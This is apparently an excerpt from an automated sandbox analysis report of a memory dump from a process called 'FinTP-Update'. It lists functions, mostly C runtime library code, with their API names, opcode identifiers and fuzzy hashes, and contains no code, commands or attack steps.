                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$_invalid_parameter_noinfo$fseekmalloc$_callnewh_fseek_nolock_ftelli64fclose
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2887643383-0
                                                                                                                              • Opcode ID: ecbb5f4e11793f58cfc1256eeb94e2ddb6e81c421b368fbe64e3b677a456ba84
                                                                                                                              • Instruction ID: ad1012af202d9e5f31439fe5fe2cc1777c0a28ca68e9136412d50dbe4f615f00
                                                                                                                              • Opcode Fuzzy Hash: ecbb5f4e11793f58cfc1256eeb94e2ddb6e81c421b368fbe64e3b677a456ba84
                                                                                                                              • Instruction Fuzzy Hash: 65518E3165CA085BEB49EB2CD4567FA72E5FB88300F50427EA49FC32D7DE289907C691
                                                                                                                              Function 0000017F38AE7758 Relevance: 7.7, APIs: 5, Instructions: 201COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _lock$_calloc_crt_mtinitlocknum
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3962633935-0
                                                                                                                              • Opcode ID: d3fa31906b04374285c2f41829bff9ed00d0eb50ff5b1303a8bf92a142dc56c5
                                                                                                                              • Instruction ID: e26a9f054a13324c0ec3c08169456cf1f16eb7d8bb35cb039466649289b01bbc
                                                                                                                              • Opcode Fuzzy Hash: d3fa31906b04374285c2f41829bff9ed00d0eb50ff5b1303a8bf92a142dc56c5
                                                                                                                              • Instruction Fuzzy Hash: 2B51E43055CA095FEB54AF18D8853A6B7E0FB58311F504A6DE85EC73A2D738E843C792
                                                                                                                              Function 0000017F38ADDD04 Relevance: 7.7, APIs: 5, Instructions: 194COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1640621425-0
                                                                                                                              • Opcode ID: a3e99b4375f2f023479d6426b902cb6211f9c5c72e620a52dd0a993eb13171df
                                                                                                                              • Instruction ID: ab8333967f8a0c19b88ca02e74e34cbccc9958ba63912fc615266522f554305c
                                                                                                                              • Opcode Fuzzy Hash: a3e99b4375f2f023479d6426b902cb6211f9c5c72e620a52dd0a993eb13171df
                                                                                                                              • Instruction Fuzzy Hash: 2251D53024CF099BEE68696D58653B776E0F7A8310F14023DD4AFC32D6EA68D857C2A5
                                                                                                                              Function 0000017F38ABE530 Relevance: 7.7, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2761444284-0
                                                                                                                              • Opcode ID: 80effe1d29ace828e06e2d887e6b7f05b29470b19c4722a7a4f67f4234a5992c
                                                                                                                              • Instruction ID: a877866e41be3fbabe390b51f586a052cc239b2a58ff6d1dc238f097a7a8e5b5
                                                                                                                              • Opcode Fuzzy Hash: 80effe1d29ace828e06e2d887e6b7f05b29470b19c4722a7a4f67f4234a5992c
                                                                                                                              • Instruction Fuzzy Hash: 1F41043025CB4D1BEF6DAA2C48216BB36E5FB95350F54413DD99BC3283ED28E81787A0
                                                                                                                              Function 0000017F38AD4CD8 Relevance: 7.6, APIs: 6, Instructions: 142COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$_snprintffreemalloc$_callnewh_invalid_parameter_noinfo
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 761449704-0
                                                                                                                              • Opcode ID: 4f468b51046dd1b741ecffd3f183b29aad7a41e3b01dfd6a8760688b114022d4
                                                                                                                              • Instruction ID: 1787e6d134b9b2b825a7a8b150301bb243cfb922284238ba7368b3cd79b22d64
                                                                                                                              • Opcode Fuzzy Hash: 4f468b51046dd1b741ecffd3f183b29aad7a41e3b01dfd6a8760688b114022d4
                                                                                                                              • Instruction Fuzzy Hash: 7C41C83034C9881FEA58AB2C24613F576E2E789310F4441ADD0DFC3297DA289D4787E5
                                                                                                                              Function 0000017F38ACAB88 Relevance: 7.6, APIs: 5, Instructions: 90fileCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno$free$_callnewhfclosefwritemalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1696598829-0
                                                                                                                              • Opcode ID: 58888c9595f105c284c851892d8424f120192ec846514e4371bc4caa0bd8f1b0
                                                                                                                              • Instruction ID: a1b8c9f320f9efe05c84762d420bfd9057f8acc7add1d953f8924efca0df191c
                                                                                                                              • Opcode Fuzzy Hash: 58888c9595f105c284c851892d8424f120192ec846514e4371bc4caa0bd8f1b0
                                                                                                                              • Instruction Fuzzy Hash: CE217C3026CA085BEA58F72894653EBB2E1FB98344F50017DA56FC32C2DD289907C3A1
                                                                                                                              Function 0000017F38AE79FC Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _getptd_noexit$__doserrno_errno
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2964073243-0
                                                                                                                              • Opcode ID: 8d2a2530b67f769613192623a9cf9c1e948dd30e3f22d79746fb026c2b14b154
                                                                                                                              • Instruction ID: 0c5484fbc4c7a90f4590a8d6d66482626e6216fb2e7ea090dcc56df472eee18c
                                                                                                                              • Opcode Fuzzy Hash: 8d2a2530b67f769613192623a9cf9c1e948dd30e3f22d79746fb026c2b14b154
                                                                                                                              • Instruction Fuzzy Hash: C501A2305A98046EFA68BB6488617E631B0FF04323F55466CA02ACB2E2D77C5946C631
                                                                                                                              Function 0000017F38AC9920 Relevance: 6.5, APIs: 5, Instructions: 254COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3512837008-0
                                                                                                                              • Opcode ID: fceffa5ca7c6ef47431c57fe47704bd18e4e78f5a6f316d06f9b846932774c08
                                                                                                                              • Instruction ID: f089b0c1660b063eeb91659e3cedf5f6529f112b542c89075dd74415f7a465ed
                                                                                                                              • Opcode Fuzzy Hash: fceffa5ca7c6ef47431c57fe47704bd18e4e78f5a6f316d06f9b846932774c08
                                                                                                                              • Instruction Fuzzy Hash: 8B919D3065CA489FEF54EB18D891BEAB3F1FB98300F04057EE45AC3192DA38D946CB55
                                                                                                                              Function 0000017F38AD6FC0 Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 388COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc$_errno$_callnewh$Socket
                                                                                                                              • String ID: VUUU
                                                                                                                              • API String ID: 3688217515-2040033107
                                                                                                                              • Opcode ID: b7380a97c91a02b6aeb5ad111fe22701e42ae69b18938086669186b4662cf8c3
                                                                                                                              • Instruction ID: d7e4558c60c359565465f24acd55855a7228ea95058c80a5da11af2c298a00d4
                                                                                                                              • Opcode Fuzzy Hash: b7380a97c91a02b6aeb5ad111fe22701e42ae69b18938086669186b4662cf8c3
                                                                                                                              • Instruction Fuzzy Hash: FDC1983165CA185BEF4DAB2898613FA72E5F788301F50413EE45FC32D2DD28990BC6B1
                                                                                                                              Function 0000017F38ADC4C0 Relevance: 6.3, APIs: 5, Instructions: 76COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2026495703-0
                                                                                                                              • Opcode ID: 6693c5a60b912c96cd03e097ab39a6e94242c87fe98adbe140429ebb858adb88
                                                                                                                              • Instruction ID: 5b555b6c08f1ea58d671ed7649435e3dacb62401c09045bf4e0396c1ac7deb1b
                                                                                                                              • Opcode Fuzzy Hash: 6693c5a60b912c96cd03e097ab39a6e94242c87fe98adbe140429ebb858adb88
                                                                                                                              • Instruction Fuzzy Hash: F311B130A1CF085FEB98EB2CA05139676E1FB8C310F50456EE15EC3392EA389D4687D1
                                                                                                                              Function 0000017F38ABA110 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: clock
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3195780754-0
                                                                                                                              • Opcode ID: 23bf94e1c80976ae72938ecc6baf259ee5865353b3677771aec914a7949ed3a8
                                                                                                                              • Instruction ID: 3f1633e1e125fe684b7ef1271c9589b5bc1093f004c6562f480aac68ed7838aa
                                                                                                                              • Opcode Fuzzy Hash: 23bf94e1c80976ae72938ecc6baf259ee5865353b3677771aec914a7949ed3a8
                                                                                                                              • Instruction Fuzzy Hash: E021297148D7085EEFA4A998A0423A7B6E0F754350F21463DDCAEC3243E559B843C2E1
                                                                                                                              Function 0000017F38ADD7C4 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1991439119-0
                                                                                                                              • Opcode ID: d035eb986a60664e633a0265855f51c6c0b722fadb3a0456b301f9678d601952
                                                                                                                              • Instruction ID: adf2c6ceea0a37daef405b6435641dfb3895b49beaf2a51cc7684f105ee84efd
                                                                                                                              • Opcode Fuzzy Hash: d035eb986a60664e633a0265855f51c6c0b722fadb3a0456b301f9678d601952
                                                                                                                              • Instruction Fuzzy Hash: 7A11B631198909DBFB5AA760DC947EB72B4F754340F40493D951FC60A1EA7C9549C670
                                                                                                                              Function 0000017F38ADD434 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                                                                                                                              • String ID: B
                                                                                                                              • API String ID: 1812809483-1255198513
                                                                                                                              • Opcode ID: 9a92ca3594ed34bb3ec29bcd6f582ec0f548cf3a32db75fd86ae0604bda4ca21
                                                                                                                              • Instruction ID: 5ecc5a56251d60d02d49157d2325428d4206053901035d8966fa2b4e9d294659
                                                                                                                              • Opcode Fuzzy Hash: 9a92ca3594ed34bb3ec29bcd6f582ec0f548cf3a32db75fd86ae0604bda4ca21
                                                                                                                              • Instruction Fuzzy Hash: F611937016CA088FD754EB18D4457A676E1F798325F1046AEA01EC32A1CA78D845C792
                                                                                                                              Function 0000017F38AD6834 Relevance: 5.2, APIs: 4, Instructions: 226COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$_errno$_callnewhmalloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2761444284-0
                                                                                                                              • Opcode ID: b320393d5ee85b59bc7cef6eaf73bf608014386b691c6aab1332f2c37e44ccf9
                                                                                                                              • Instruction ID: b7fb88f4e447de497faaa8fa08f538bbc8f05ac9e6fc3901de466377f9cc12f3
                                                                                                                              • Opcode Fuzzy Hash: b320393d5ee85b59bc7cef6eaf73bf608014386b691c6aab1332f2c37e44ccf9
                                                                                                                              • Instruction Fuzzy Hash: 0461723025CA085BEF59FB2898617EF72F1FB98300F51453DE46FC3196DA28994BC6A1
                                                                                                                              Function 0000017F38ACD5DC Relevance: 5.2, APIs: 4, Instructions: 202COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: free$malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2190258309-0
                                                                                                                              • Opcode ID: 5a40a0e94060670422349b9e6bf787308a195d4bb32eada3265d8002cef63e51
                                                                                                                              • Instruction ID: d19331a94cb05632f5245ab107b840f9b46c52e9c605d4eed99377741512eafd
                                                                                                                              • Opcode Fuzzy Hash: 5a40a0e94060670422349b9e6bf787308a195d4bb32eada3265d8002cef63e51
                                                                                                                              • Instruction Fuzzy Hash: 7051D331668A085BEF58EF1CC8957E673F0FB54310F54417EA86EC7286DA38D847C6A0
                                                                                                                              Function 0000017F38ABD340 Relevance: 5.2, APIs: 4, Instructions: 179COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.3358331588.0000017F38ABA000.00000040.00000020.00020000.00000000.sdmp, Offset: 0000017F38ABA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_17f38aba000_FinTP-Update.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2803490479-0
                                                                                                                              • Opcode ID: 831f2e9885edd163ac8498915175aadf5c250e8f0ae2e53932ac784c9baa1653
                                                                                                                              • Instruction ID: b1d2f59ef376c523ba73a205798d141380ca3462983d7e1fe3762b8baaea6b71
                                                                                                                              • Opcode Fuzzy Hash: 831f2e9885edd163ac8498915175aadf5c250e8f0ae2e53932ac784c9baa1653
                                                                                                                              • Instruction Fuzzy Hash: C851C23025CA455BEF99DF2C94912AB73E1FB88310F50456DEC6FC3286EE24E843C691